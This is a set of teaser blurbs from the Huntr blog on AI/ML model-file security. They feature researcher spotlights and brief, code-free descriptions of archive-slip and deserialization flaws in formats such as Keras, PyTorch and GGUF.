The ability to save (serialize) and load (deserialize) trained models is fundamental to machine learning frameworks. Training a neural network can take hours, days or even weeks on expensive hardware, so developers need to save their work and share with others. Every major framework (PyTorch, Tensorflow, scikit-learn) implements these features because without it, machine learning would be impractical at scale.| Huntr | Blog
Introduction Some researchers dip their toes into AI/ML security. Phung Van Tai (aka @taiphung217) cannonballed in. Valedictorian of Vietnam’s Academy of Cryptography Techniques and now an AppSec engineer at OneMount Group, Tai rocketed from newcomer to quarterly #1 on the huntr leaderboard in just five months. Impressive, right? Dive into his journey below to see the full story.| Huntr | Blog
Introduction Some Ph.D. candidates stay up late fine-tuning models. Tong Liu (aka Lyutoon) stays up late trying to break them. At huntr, we’ve got a thing for spotlighting hackers. This month, the beam lands on Lyutoon, a Ph.D. student at the Institute of Information Engineering, Chinese Academy of Sciences. So grab your beverage of choice and let’s dive into the mindset, methods, and mayhem behind this fast-rising hunter. Tell us a bit about yourself—what’s your background or story?...| Huntr | Blog
Many ML model files— .nemo, .keras, .gguf, even trusty .pth— are just zip/tar archives in disguise. Feed one to a loader that blindly calls extractall()and pow, you’ve opened the door to an archive-slip (Zip Slip, TarSlip) directory-traversal bug.| Huntr | Blog
Before Google even filed CVE-2025-1550, one of our Huntr researchers, Mevlüt Akçam (aka mvlttt on huntr), quietly unearthed a critical flaw that delivers arbitrary code execution the moment you load a malformed .keras model—or, astonishingly, even a JSON file. In the post below, they’ll walk you step-by-step through the discovery process and unpack their proof-of-concept.| Huntr | Blog
Introduction Some people skipped online classes during lockdown to binge Netflix. Arun Krishnan skipped them to hack around on cheats for an online game—and ended up chasing bug bounties. This month, we're spotlighting Arun, aka winters0x64. Arun’s a 20-year-old cybersecurity student from Kerala, India, who sharpened his skills playing CTFs with Team bi0s—India’s leading cybersecurity research club. After plenty of hypothetical hacks, Arun jumped onto huntr, ready to tackle real-world...| Huntr | Blog
Sometimes the simplest bugs are the most dangerous — especially when they’ve been hiding in plain sight.| Huntr | Blog
In this blog, we’re breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like TensorFlow—with its Keras Lambda layers—can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs.| Huntr | Blog
In this blog, we're breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like PyTorch can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs on huntr.| Huntr | Blog
Dan McInerney shares strategic tips for bug bounty success, focusing on AI/ML model file vulnerabilities and effective tool usage for impactful discoveries.| blog.huntr.com
Huntr Blog| blog.huntr.com
Discover how to identify and exploit vulnerabilities in machine learning model file formats like GGUF, Keras, and ONNX.| blog.huntr.com